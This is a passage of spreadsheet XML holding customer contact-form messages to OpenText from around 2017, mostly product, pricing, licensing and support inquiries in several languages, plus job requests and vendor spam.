We would be obliged if we are given an audience where we could discuss further and explore the possibilities for providing our services to your organization. I anticipate that your company will make use of my services. Looking forward for an early and positive response._x000D_
 _x000D_
This email to provide you with the gist of our services as Vanilla Consulting._x000D_
   Permanent or Contract - We understand the need for excellent people, since it is people that represent a company’s source of innovation and competitive advantage. Our clients have the flexibility of hiring their staff permanently or on a contractual basis._x000D_
Insightful Candidate Summaries - All qualified candidates selected for interviews are submitted to </t>
  </si>
  <si>
    <t>Interested in evaluating the ECM Solution.</t>
  </si>
  <si>
    <t xml:space="preserve">pricing for the following software:_x000D_
Documentum Content Server_x000D_
Documentum XML Transformation Services_x000D_
Documentum Administrator_x000D_
Documentum Document Transformation Service_x000D_
Documentum Process Engine_x000D_
Documentum Process Integrator_x000D_
Documentum Retention Policy Services_x000D_
Documentum TaskSpace_x000D_
Documentum WebTop_x000D_
Documentum WebTop Language pack Español_x000D_
Documentum ImputAccel_x000D_
Documentum D2_x000D_
Documentum XCP_x000D_
Documentum Composer_x000D_
Documentum Xplore_x000D_
Documentum Records Manager_x000D_
</t>
  </si>
  <si>
    <t>Please let this communication serve as notice that customer #US01-GA419 is cancelling service with Open Text.  Please respond accordingly.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
bitte erstellen Sie mir ein unverbindliches Angebot über Ihr Produkt  	OpenText Exceed 15._x000D_
_x000D_
MfG_x000D_
M.Peuser_x000D_
_x000D_
IT-Peuser_x000D_
Markus Peuser_x000D_
Kurmainzerstrasse 6_x000D_
65439 Flörsheim</t>
  </si>
  <si>
    <t>We are finalizing a US Gov proposal that requires the continued use of Livelink.  To this end, the customer has required us to include the annual Livelink license/maintenance costs in our proposal.  The project is in Las Vegas, NV.  Would you be able to provide us with this costs by July 12, 2017?</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
May I request the copies of my P60 s for the year I spent in Opentext please ?_x000D_
And, also a certificate of employment._x000D_
_x000D_
I was working with you in Reading 2014-2015._x000D_
_x000D_
A PdF version would be ideal._x000D_
_x000D_
_x000D_
My address is still the same:_x000D_
_x000D_
(Hoang) Tam NGUYEN_x000D_
27 Sackville Street_x000D_
RG11NT READING_x000D_
_x000D_
Thank you very much !_x000D_
_x000D_
Best regards,_x000D_
Tam.</t>
  </si>
  <si>
    <t>We have been Documentum customers since 2003. We are evaluating alternatives to Documentum since we have not had any communication since the acquisition by OpenText, I'm not even sure who our sales rep is today. We are considering attending the upcoming conference to learn more about the future plans for Documentum but would like to know if there are complimentary passes for legacy customers. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
_x000D_
My name is Alvaro Suarez and I am the IT Manager at Softron ( www.softron.biz) a leader provider of solution at the south cone._x000D_
_x000D_
I contact you because I have a prospect in Uruguay and I would like to move forward with this issue and also make a long term business relationship._x000D_
_x000D_
I really appreciate, if you could contact me ASAP._x000D_
_x000D_
Thanks in advance,_x000D_
Kind Regards,_x000D_
Alvaro.-_x000D_
_x000D_
Ing. Alvaro Suárez_x000D_
Softron - Uruguay _x000D_
Teléfono: (598) 26233093_x000D_
Antonio Costa 3578, Montevideo, 11300_x000D_
www.softron.biz_x000D_
</t>
  </si>
  <si>
    <t>I have an RFI that I would like to send to OpentText and I need contact information.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are right person to discuss about updated database of Television, Radio, Gaming, Advertising and all Entertainment Sector._x000D_
_x000D_
We are leading B2B database providing firm serving all the industries and sectors. We can provide you optimized contacts based on your target criteria._x000D_
_x000D_
We can provide you contact details of various Key decision makers across the industry including Owner, CEO, CFO, CTO, President, Director, Executive Producers, Production houses, Sales head, Business _x000D_
development head, Content acquisition head, Senior Analyst, Principal information architect, Advanced technology and many more._x000D_
_x000D_
Kindly let me know your target criteria so that I can provide you counts available:_x000D_
Target Industry:_x000D_
Target Job title:_x000D_
Target Geography:_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Ethan Morris</t>
  </si>
  <si>
    <t xml:space="preserve">we need to implement Opentext 16.2 in banco Atlántida, do you have any partners options for Honduras, or near in central america?_x000D_
_x000D_
would you please can give me more than one partner option._x000D_
_x000D_
warm regards </t>
  </si>
  <si>
    <t>Failed JPEG downloads - I have successfully downloaded many JPEG files but in the "Jobs" section each download is stated as "failed" and I cannot download it recently. I'm not sure how to fix it as I'm not doing anything differently from how I downloaded them before.</t>
  </si>
  <si>
    <t>Want to work at OPENTEXT. Please provide an opportunity._x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>Need to validate if our solution will work with Office 365.</t>
  </si>
  <si>
    <t>I would like a demo of the eDocs integration with SharePoint 2013. I answer email and most often let phone calls go to voicemail unless they are planned. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
Could you please provide a quote or an OpenText™ Gupta SQLBase license?_x000D_
Thank you_x000D_
Best regards._x000D_
</t>
  </si>
  <si>
    <t>Is this the same company that used to be called Xenos?_x000D_
if it is I like to know how can I get trained and certified in you transformation software from AFP docs to PDF docs and vise versa? Can you please let me know? Sincerely David Sequoias</t>
  </si>
  <si>
    <t>Hello,_x000D_
Could you please confirm your remittance instructions in order for us to pay your invoice SNL08117930?_x000D_
Thank you very much._x000D_
Best regards,_x000D_
Vanessa Houba_x000D_
UCL</t>
  </si>
  <si>
    <t>I was told there were great resources in your knowledge centre.  I have verified my email a number of times today and I am still receiving the Verify Email screen.  Thanks.</t>
  </si>
  <si>
    <t>We need to verify details of one of your former employees. Just the job title and employment dates need to be verified. Please help us with contact details for your Human Resources Department or the Authorized Personnel who can provide verification.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
zum umkomplizierten Betrachten und Ausdrucken von DWG-Dateien haben wir jahrelang den Free-DWG-Viewer von BRAVA genutzt und jedes update mitgemacht. Mittlerweile bieten Sie diesen Viewer an, aber auf der website bin ich nicht so richtig vorangekommen - weil ich z.B. nicht erfahren kann, was mit den Daten, die ich zur Registrierung hinterlege, passiert. Ist die Registrierung kostenfrei, gehe ich damit irgendwelche Verpflichtungen ein? Das konnte ich der Seite nicht entnehmen - und ich bin des Englichen durchaus mächtig... Wenn es die Registrierungsseite in Deutscher Sprache gäbe, fühlte ich mich schon sicherer beim Ausfüllen der Formularfelder._x000D_
_x000D_
Grüße Julia Faißt</t>
  </si>
  <si>
    <t xml:space="preserve">I am fresher, I have completed my post graduation(MCA) from NIT Bhopal and I am looking for business analyst profile. </t>
  </si>
  <si>
    <t>need somebody who known streamserve to help us during 2 or 3 days</t>
  </si>
  <si>
    <t>We implement Hybris commerce projects . Keen to evaluate Open Text DAM and develop the skills required for using DAM in Projects.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Notre version de StreamServ est la 4.1.2 SP1 Buil 1062 sous WINDOWS 2003 et nous voulons migrer vers une version plus récente de votre application avec laquelle nous pouvons récupérer tous nos projets déjà créés. Nos serveurs sont tous sous WINDOWS._x000D_
Ainsi, pourriez-vous nous dire si cette migration est, à priori, possible?_x000D_
Merci de votre compréhension._x000D_
Cordialement.</t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of an international organization combating violent extremism in Saudi Arabia, I am contacting your organization for the final time to gauge interest in supporting an open source monitoring and collection capability for our organization._x000D_
 _x000D_
Your suite of capabilities have been identified by our organization’s leadership as a potentially viable partner for supporting our mission needs. We are looking to issue an RFP and in order to share further information and we require that you sign an NDA to move further in the process._x000D_
 _x000D_
We request that you respond to specify affirmatively or negatively your level of interest as soon as possible and no later than Friday, July 7th 2017, 17:00 GMT+3._x000D_
 _x000D_
Thank you for your time. We look forward to your reply._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
Shall we clarify which OS later than windows server 2008 and which MS SQL database version later than MS SQL 2008 are offically supported for SQLWindows 5.2 developed application, thank you._x000D_
Mr. Chong</t>
  </si>
  <si>
    <t>Looking for TD 6.2 SP5 patch over TD 6.2 SP4 installation</t>
  </si>
  <si>
    <t xml:space="preserve">Issue, with installing IRM for PDF on Windows 10 version 10.0.15063_x000D_
I have installed newest Adobe Acrobat Reader DC and downloaded newest IRM Client for PDF v5.1 SP2 (for Adobe 9.5, 10.1.2, DC 2015) for Windows 7 SP1, 8, 8.1 and 10_x000D_
_x000D_
Please contact me fast and via e-mail._x000D_
Kind ragards_x000D_
Jonas </t>
  </si>
  <si>
    <t>I have no access to the support.</t>
  </si>
  <si>
    <t>Request for access to OpenText Documentations</t>
  </si>
  <si>
    <t xml:space="preserve">Our Company interested with open text. </t>
  </si>
  <si>
    <t>Hi,  I am responding to a tender for a centera migration that is being used by documentum,  I would like to know what data migration options are available to change storage medium as easily, seamlessly and cost effectively as possible._x000D_
_x000D_
This is urgent and I appreciate a speedy response if at all possible._x000D_
_x000D_
Thanks in Advance_x000D_
 - Mac</t>
  </si>
  <si>
    <t xml:space="preserve">Buenas tardes, _x000D_
¿Cuentan con personal en México?, de ser afirmativa la respuesta agradecería me proporcionen algún número telefónico para comunicarme con ustedes. _x000D_
_x000D_
_x000D_
Saludos! </t>
  </si>
  <si>
    <t>Ich bin auf der Suche nach Release notes/ Version history für Capture Suite/ Capture Center</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs, _x000D_
_x000D_
You have been selected to submit a proposal to incorporate the requirements of the Business Management System in the  document I have ready for submission, I require a contact and email address. The timescales in the RFI are fairly aggressive but we believe entirely achievable.  _x000D_
_x000D_
Regards_x000D_
_x000D_
Clive_x000D_
</t>
  </si>
  <si>
    <t>We would like to upgrade our Brava so that it would be compatible with our incoming upgrade of D2 from version 4.2 to 4.5 or 4.7. Our Brava is currently at version 7.1 and we would like it to be upgraded to a newer version that would be compatible to the latest D2 version</t>
  </si>
  <si>
    <t>Bonjour, malgré un contrat de maintenance valable juqu'en novembre 2017, je n'ai pas accès au support pour télécharger une mise à jour de Exceed 3D V15</t>
  </si>
  <si>
    <t>I have information of a company selling Case360 all over East Africa without OpenText's permission &amp; knowledge.</t>
  </si>
  <si>
    <t>Do you offer a web-based, multi-tenant, ECM service for non-profit organizations? We would have about 100 authors, changing annually, and about 3000 readers who currently read from an open web site._x000D_
_x000D_
One option we are looking at is Google Drive.</t>
  </si>
  <si>
    <t>Service Request number: 1-2966335009</t>
  </si>
  <si>
    <t>Partnership opportunity with ACTUATE - BIRT Performance Scorecard</t>
  </si>
  <si>
    <t>please,_x000D_
I would like to know the price of the software Gupta Team Developer 6.2._x000D_
Thank you</t>
  </si>
  <si>
    <t>INVOICE SRAG08226663</t>
  </si>
  <si>
    <t>buying Enterprise Scan</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
         We are the official supplier for FORD Romania, for chemical products, code FZFSA  and please let us know the costs and implications for providing a VAN connection for EDI CONNECTION with Ford Romania SA._x000D_
        We are looking forward for an answer from you and receiving the requested information._x000D_
_x000D_
Thank you! </t>
  </si>
  <si>
    <t>Hi I might join course "3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp" I can see that you have the course scheduled to run on the 7th of Aug. In either Amsterdam, Reading, Stockholm and Helsinki. Can you confirm if you expect any of the courses to run? I would prefer to go to Amsterdam._x000D_
Br Martin</t>
  </si>
  <si>
    <t>We are in the process of implementing SAP but we also need a Vendor Invoice Management program. We are looking into an alternative for the VIM from SAP.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm part of a centralized desk in SoftwareONE which is responsible for gathering our customer's license history information for various reasons (reselling, Software Asset Management etc.). For all such requests we'll have an email approval directly from the customer rep or a letter of delegation signed by the customer which allows SoftwareONE to request this data._x000D_
Just wanted to check if this will be the correct people to request these? If not, kindly share the contact._x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
Could you please provide me with the conatct email for London office?_x000D_
thanks_x000D_
Carlos</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested in purchasing Opt-in email list of “Supply chain professionals” from your target region?_x000D_
_x000D_
Please let me know your requirement, I’ll get back to you with Counts and samples for your review._x000D_
_x000D_
Target Industry: _______; Geography: ________; Job Title (Any): ___________:_x000D_
_x000D_
Regards,_x000D_
Adam Nealson_x000D_
adam.nealson@v3dataintel.com_x000D_
Inside sales executive_x000D_
Our services includes- List Acquisition; Email Appending; Email Campaign; Company Profiling and Web Designing etc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I want to purchase one system for employee expense claim scanning system. Pls call me if possible, tks.</t>
  </si>
  <si>
    <t>Anfrage eines Endkunden von uns für  OpenText Software CC CRM; Bedarf: 2.000 Lizenzen</t>
  </si>
  <si>
    <t xml:space="preserve">Albanian NNSS </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Total Energie Gaz souhaite mettre en place une solution de dématérialisation des factures fournisseurs et des chèques clients._x000D_
Pourriez-vous me contacter pour que je vous présente notre besoin afin que vous puissiez nous proposer vos solutions?_x000D_
Cordialement</t>
  </si>
  <si>
    <t>Would like to get full access as we are contracted for SAP VIM. I would like to download the update files fro SAP.</t>
  </si>
  <si>
    <t>Hello,_x000D_
we need an offer to Upgrade our OpenText™ Gupta SQLBase from Version 8.5 to 12. We have a license for 10 Users. Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 _x000D_
I am sorry for my disturbing, but I know that my team can be useful for you. Probably, you need someone for making DTP services for your translation agencies. If I am right, you are welcome to ask me any questions you are interested in because I am a person who work in the DTP services sphere and not only. Thank you for your time! Let’s collaborate together._x000D_
 _x000D_
Best regards,_x000D_
Elena_x000D_
 _x000D_
Web-design | Packaging&amp;Label Design | Layout&amp;DTP | Advertising constractions | POSM | Annimation Video| Illustration._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like more information on any tools available to assist in a data migration project (migrating documents out of eDocs/Hummingbird DM), or partners that are recommended for this purpose. _x000D_
Thank you,_x000D_
Victoria</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
A la recherche d'un logiciel de BPM, en appui de nos prestations d'intégration et sous-traitance de process métier pour nos client, mais aussi avec un premier projet test de dématérialisation du process de validation des factures fournisseurs au sein de notre groupe (Groupe INFORSUD). Pouvez-vous me contacter rapidement pour voir de l'intérêt à vous envoyer notre cahier des charges? Merci</t>
  </si>
  <si>
    <t>We want to know if we can update our company name under our existing User ID(bund18@uimax.com) and Account Number(HK01-TI00114) on GXS, what should we do if we need to make this change?</t>
  </si>
  <si>
    <t xml:space="preserve">Please advise the operating systems that your EDI Gateway software is compliant with.  </t>
  </si>
  <si>
    <t>I´m interested on the Extream software solution (formerly by HP). Is there a distributor or business partner in Peru?, If any please send me the information to the contact email address above._x000D_
Thank you.</t>
  </si>
  <si>
    <t>check do status da parceria</t>
  </si>
  <si>
    <t>We are currently using Web and App Extender v6  and  Teleform v 10.4  We are way behind on upgrading them and no longer have a maintenance agreement for them. Our main need is to get our Teleform database off the SQL5  server and onto SQL 8 or 12.  For App Extender, we need to get if off our Windows 2003 server. The vendor we used to use no longer supports these products. It looks like Opentext supports both of these.  I would like to talk with someone about our options._x000D_
Thanks,_x000D_
_x000D_
Eileen Lewis</t>
  </si>
  <si>
    <t>I have a cloud software company that helps architects and engineers manage information (www.tonicdm.com)._x000D_
I would like to know if Brava is available for embedding in a cloud service such as TonicDM as it's view and markup tool? _x000D_
If so, how is the cost of Brava calculated for this use case?_x000D_
Thank you,_x000D_
Reg</t>
  </si>
  <si>
    <t xml:space="preserve">Horizon is considering how to replace our on premises unstructured file storage with a cloud-hosted document management system. This system has to be high performing and it has to be safe and secure enough to support private Healthcare data of our Members and Providers (ePHI data). A key requirement is to integrate well with our Legal Hold, eDiscovery platform and to fully support Records Management automation._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am representing Up2date Technology Solutions – LLC, and we are specialized in staffing man power for several technical and IT skills for top leading MNC's that include Apple, Intel, Ericcson etc.,_x000D_
_x000D_
Currently we are working towards expanding our horizon by finding new clients, whom we can support with our excellent resources._x000D_
_x000D_
In this regard, we request you to share your requirements (Job descriptions)and we would glad to help you in finding talented people to work for your organization._x000D_
_x000D_
We have a team of 45 experienced recruiters and do C2C, W2, and 1099 and have placed more than 100+ resources all over the world._x000D_
_x000D_
I have attached my company profile for your concern, and look forward to work with you for your business recruitment._x000D_
_x000D_
If you have any questions, please contact me._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Prince Martin_x000D_
_x000D_
BDM (Team)_x000D_
_x000D_
Up2date Technology Solutions_x000D_
_x000D_
Phone:- + 215-716-1389 | +91-9092650222_x000D_
_x000D_
Email :- prince@up2datetechsol.com_x000D_
_x000D_
Website :- www.up2datetechsol.com</t>
  </si>
  <si>
    <t>Contact for RFP</t>
  </si>
  <si>
    <t>Needed to upgrade our Dazel Server Sofrware</t>
  </si>
  <si>
    <t xml:space="preserve">Subject : Translation services (freelance)_x000D_
_x000D_
_x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
I am a freelance translator who would be interested in joining forces with you to offer you quality French communication services in all your fields of activities._x000D_
Would you be interested in receiving my presentation letter and my resume?_x000D_
_x000D_
I thank you in advance for your reply and wish you a nice day._x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
Anne Carruzzo_x000D_
</t>
  </si>
  <si>
    <t>I have an employee who is registered to take an OpenText virtual training course on July 17, 2017.  I want to know if it's possible to transfer that registration to another employee within my company?  If so, who can I speak with to take care of the transfer?_x000D_
_x000D_
I have called the helpline and left a voicemail regarding this last week but received no response back.</t>
  </si>
  <si>
    <t>I wish to clarify the difference between the 'single seat' and 'Network Version' of Brava Desktop.</t>
  </si>
  <si>
    <t>I am product manager for Priority Software, the creator, developer and distributor of Priority ERP. Priority Software is an Israeli company of over 30 years, with more than 8500 clients in Israel and worldwide (40 countries)._x000D_
It is on our product short term roadmap to improve the layout and design capabilities for the documents that our system produces and for that reason I am now looking at various solutions and partnership potentials with companies in this field._x000D_
I will gladly have a session with you to understand how the product works and how can it integrate with Priority._x000D_
Thanks,_x000D_
Lina</t>
  </si>
  <si>
    <t>Pricing details</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
 _x000D_
due to a Windows 10 upgrade/rollout, we would like to know if the application "Spicer Imagenation v8.1" is compatible with Windows 10 or if there are any limitations._x000D_
_x000D_
Regards_x000D_
Gurjinder Singh</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are using HP Exstream(Dialogue) product with version 8.3.5_x000D_
Can you please provide me the below details -_x000D_
End of support of this version ?_x000D_
Is this version compatible with z/OS 1.13 ?_x000D_
Do we need to upgrade this product ?_x000D_
Do we need to apply maintenance ?_x000D_
What is the latest version ?_x000D_
If the product needs to be upgraded, do we get the product package from vendor ?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Want to check community for guide in web service development using unify</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I would like to know what the options are regarding Hummingbird. Is this a product you can supply new licenses for and subsequently support, or is it completely discontinued?_x000D_
Thanks_x000D_
_x000D_
Tim_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in the ECM solutions you offer. We are looking to implement an ECM System within the department. We would like to have a consultant come and demo the options.</t>
  </si>
  <si>
    <t>Hi Opentext! I just want to know if your company offers MMS Sending? _x000D_
_x000D_
_x000D_
1. The idea is to send MMS blast to identified accounts every 1st day of the month. Accounts will come from Cash Credit._x000D_
2. Similar to Chikka SMS blast, MMS spiel/script and list of mobile numbers will come from Cash Credit. Estimated 8K accounts._x000D_
3. Pilot is once a month or every 1st day of the month. But should be flexible anytime to weekly or 2X a month._x000D_
_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi, I am trying to determine whether eDOCS DM10 and RM10 are compatible with Windows 10, for one of our clients._x000D_
_x000D_
Are you able to advise whether or not these applications are compatible with Windows 10?_x000D_
_x000D_
Thanks._x000D_
Will.</t>
  </si>
  <si>
    <t>Customer BAGI (Bharti AxaGI) would want to have a special support contract with OpenText that can implement Resolution Time for issues, in addition to the Response Times, and hence would like to get in touch with OpenText. Let me know how to take this forward.</t>
  </si>
  <si>
    <t>Documentum Inquiry_x000D_
We are interested in Documentum as a document management system to be implemented in our company</t>
  </si>
  <si>
    <t>Looking for an enterprise eDMS.</t>
  </si>
  <si>
    <t>Dialogic Corporation Boston Host service down</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day!_x000D_
_x000D_
I am Mike,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phone number._x000D_
_x000D_
So let me know if you would like me to mail you more details or schedule a call. We'll be pleased to serve you. _x000D_
_x000D_
100% Satisfactions is our guarantee._x000D_
_x000D_
I look forward to your mail._x000D_
_x000D_
Thanks and Regards_x000D_
Mike Smith_x000D_
Sales Manager_x000D_
Skype - digiprow_x000D_
Whatsapp- +91-8571045300_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we have placed an order via email to tmaxwell@opentext.com PO# 6383944 for a total of $63,843.02 on 06/13/2017, we are looking for the copy of Invoice for this one but we haven't heard back a word from your Reps. Can you please send me the copy of invoice by today as this is really very urgent and becoming a matter of my liabilities._x000D_
</t>
  </si>
  <si>
    <t>Invite</t>
  </si>
  <si>
    <t>Contact for resetting GXS password no longer works at company</t>
  </si>
  <si>
    <t>I would like to see your pricing options for OpenText Extended ECM for Microsoft® SharePoint®, and would like to know if it is possible to test a trial version.</t>
  </si>
  <si>
    <t>request for demo of OpenText eDocs</t>
  </si>
  <si>
    <t>We are looking for invoice processing solutions, specifically where the vendor uses OCR to read paper invoices then route for approval.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope you are right person to discuss about the contact list of Cyber security industry._x000D_
_x000D_
Please check below few target prospects that you can target regarding your products and services._x000D_
_x000D_
Chief Executive Officers, Chief Information Officers, Information Asset Owners, Chief Technology Officers, Chief Information Security Officers, Information Governance Officers, GP’s, Chief Risk Officers, Heads of Risk and Compliance, Security Architects, Security Directors and Managers, Head of IT,  IT Team leader, IT Security Engineers, IT and cyber security professionals, IT security directors/managers, Head Of Information Security, IT Manager, Head of IT Operations, IT security researchers/programmers, Vice President Of Corporate Security, Information Security Specialist, Information Security Manager, Cyber Security consultants, Cyber Security Specialists, Cyber Investigators, Compliance Professionals, Health Record Managers, Training Support Officers, Clinical Governance Directors and Managers, IT infrastructure safety, Traffic safety, Cyber safety, Fraud Specialists, Training Support Officers and Managers, Computer Systems Manager and many more. _x000D_
_x000D_
Kindly let me know your target criteria so, that i can provide you more information regarding the same._x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Regards,_x000D_
Kiyara James_x000D_
Marketing Manager_x000D_
----------------------------------------------------------------------------------------------------------_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out"._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need contact for RFP - received bounce back email from Opentext contact from last year. _x000D_
_x000D_
I’m part of the strategic sourcing team at Disney supporting Media Networks. I am working closely with internal stakeholders on Media Asset Retrieval System (MARS) RFP for ABC news._x000D_
_x000D_
The goal of this RFP is to identify a replacement system for MARS.  The new solution must support the current MARS functionality as well as provide enhancements. Our aim is to provide a single overarching asset management and search solution for the various video production subsystems in use at ABC News.  _x000D_
</t>
  </si>
  <si>
    <t>I am part of a team here that manages the error queues in RIghtFax. We go through and resend all of the faxes that did not transmit successfully from the day before.  We have noticed that some fax numbers have never had a fax successfully go through.  When calling these locations, we have found that we often hear of services such as RingCentral or Efax so we're wondering if RightFax has issues sending faxes to specific types of faxes and or specific cloud services.  If so, what solutions are available to make these faxes go through successfully?</t>
  </si>
  <si>
    <t>I am looking into ECM options for our organization. In particular, records retention, classification, and a tool to discover what data we hold and where it is.</t>
  </si>
  <si>
    <t>I'm interested in your enterprise information management solution for Microsoft</t>
  </si>
  <si>
    <t>Hello, _x000D_
I tried several times to reach the number +31 0235652333 but it was impossible to talk to someone. I called last week asking for a quote (I need the dutch branch). I did  receive no feedback on this. I have not any email address I can contact since no one left me any useful contact. Please provide me with an answer as soon as possible since this feedback is more than needed. I look forward to hearing from you. kind regards,_x000D_
Stefano</t>
  </si>
  <si>
    <t>I would like the 15 day trial version of Redact IT Desktop.  This is the 3rd time I'm e-mailing you.  I need to get the trial version first to take it to our test lab to make sure it works in our environment.  If work, then we will purchase.  PLEASE GET IN CONTACT WITH ME!</t>
  </si>
  <si>
    <t>Dear Sir/Madam, We are one of software vendor that doing projects for Hong Kong government. Since Hong Kong gov has selected opentext as their next generation system. Shall i evaluate it? To see if my technical team can get start doing development on it. Thanks</t>
  </si>
  <si>
    <t>licence renewal</t>
  </si>
  <si>
    <t>Hi,_x000D_
could you please send me quotation for an opentext-gupta-sqlbase license_x000D_
Thank you_x000D_
Regards</t>
  </si>
  <si>
    <t>Hello!  I am contacting you regarding a mutual client of ours: NSK.  In particular, Scott Vitek (viteks@nsk-corp.com) at NSK Americas, Inc.  Please feel free to reach out to him for any required verification._x000D_
_x000D_
The issue I'm contacting you about is their BI Server.  Periodically, and now up to several times a day, the BI Server (BI Web is typically what they use) will deny access to all accounts except the root/admin account with an 'Unrecognized username or password' error.  Rebooting the server resolves the issue temporarily.  In looking through the Knowledgebase, I did see the article about moving the users from Unlicensed to Licensed, but all users are already under the licensed tab.  In looking through the event log, I do see a multitude of Application Errors from biqserver.exe: Faulting application biqserver.exe, version 0.0.0.0, faulting module TAO_PortableServer.dll, version 1.4.0.0, fault address 0x00038ef4._x000D_
_x000D_
Please let me know the next steps we'll need to take to work on resolving this issue for them._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Can I pay hourly for support?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My company is looking for an ECM solution such as Open Text Content Suite._x000D_
_x000D_
_x000D_
Below is an overview of the project and the main questions at this stage._x000D_
_x000D_
_x000D_
Could you please give me a feedback on these points._x000D_
_x000D_
If you have a contact for the Belgian market , I am interested._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Xavier _x000D_
_x000D_
Context:_x000D_
Company: RSM Belgium_x000D_
Location: Zaventem, Belgium_x000D_
Size: 160 users / medium company_x000D_
Current situation: no ECM solution implemented_x000D_
_x000D_
The Sector: finance (audit, tax, accounting) _x000D_
_x000D_
Project objective:_x000D_
Implement an ECM solution especially for the Documentation Management System functionality._x000D_
_x000D_
Important criteria checklist:_x000D_
Presence of specific template for the financial sector (specialization possibility)	_x000D_
Maintenance perspective: long term	_x000D_
Migration capacity (ex: moving to Microsoft Sharepoint)	_x000D_
Presence of archiving functionality	_x000D_
Possible association with a CRM, example: interaction with IBM Lotus Note or Microsoft Outlook	_x000D_
Complexity of the product: need of trainings	_x000D_
Technical support conditions	_x000D_
Solution recommended	_x000D_
Price overview for the minimal solution	_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir haben von Ihrem Unternehmen mit Sitz in England eine Rechnung erhalten. Leider ist auf der Rechnung keine UStID angegeben. Ich bitte um entsprechende Mitteilung._x000D_
Vielen Dank und Gruß_x000D_
M. Jenß</t>
  </si>
  <si>
    <t>I heard that OPenteXT has already appointed a distributor/reseller of ALCHEMY in the Philippines, AGDinfotech, inc._x000D_
_x000D_
Pls. confirm if this is true and may we know what their expertise is, insofar as supporting Alchemy._x000D_
Thanks._x000D_
Nona</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My company is looking for an ECM solution such as open text content suite._x000D_
_x000D_
_x000D_
Below is an overview of the project and the main questions at this stage._x000D_
_x000D_
_x000D_
Could you please give me a feedback on these points._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Xavier _x000D_
_x000D_
Context:_x000D_
Company: RSM Belgium_x000D_
Location: Zaventem, Belgium_x000D_
Size: 160 users / medium company_x000D_
Current situation: no ECM solution implemented_x000D_
The Sector: finance (audit, tax, accounting) _x000D_
_x000D_
Project objective:_x000D_
Implement an ECM solution especially for the Documentation Management System functionality._x000D_
_x000D_
Important criteria checklist:_x000D_
- Integration with Office 365	_x000D_
- Presence of specific template for the financial sector (specialization possibility)	_x000D_
- Maintenance perspective: long term	_x000D_
- Migration capacity (ex: moving to Microsoft Sharepoint)	_x000D_
- Database connection possibilities (SQL, Oracle, DB2, …)	_x000D_
- Presence of archiving functionality	_x000D_
- Possible association with a CRM, example: interaction with IBM Lotus Note or Microsoft Outlook	_x000D_
- Clients access portal for documents management	_x000D_
- Complexity of the product: need of trainings	_x000D_
- Technical support conditions	_x000D_
- Solution recommended	_x000D_
- Price overview for the minimal solution	_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, Would you interested in Oracle Technology Customers database from UK.?_x000D_
_x000D_
We have  7,451 Tele verified database of Oracle Technology Customers from UK.(Newest 2017) _x000D_
_x000D_
Kindly revert with your requirement for a test file._x000D_
_x000D_
We have also available Tele verified Customers database of  JD Edwards, Oracle CRM, Oracle BI, Oracle Eloqua, Oracle Exadata, Oracle Fusion, Oracle 10g, Oracle 11g, Oracle 8i, Oracle 9i, Oracle Hyperion,Oracle Essbase, Oracle Endeca, Oracle Exadata,Oracle Procurement._x000D_
_x000D_
Cheers,_x000D_
_x000D_
_x000D_
Delphine Griswold_x000D_
CMO_x000D_
Lead pool_x000D_
Email:delphine.griswold@lead-pool.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hybrid Faxing with OpenText RightFax Connect._x000D_
We are moving to SIP based PABX and are having difficulties handling faxing._x000D_
We are interested in model which can receive faxes centrally and then have a workflow where users are able to triage the faxes, update status when they are processing them._x000D_
We are a healthcare company, so patient privacy is paramount to our processes.</t>
  </si>
  <si>
